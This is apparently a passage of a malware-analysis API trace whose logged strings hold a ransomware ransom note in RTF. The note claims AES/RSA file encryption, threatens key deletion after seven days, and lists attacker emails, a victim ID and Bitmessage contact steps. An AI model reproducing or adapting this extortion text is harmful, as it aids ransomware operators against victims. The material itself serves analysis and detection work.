l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.126] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.126] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 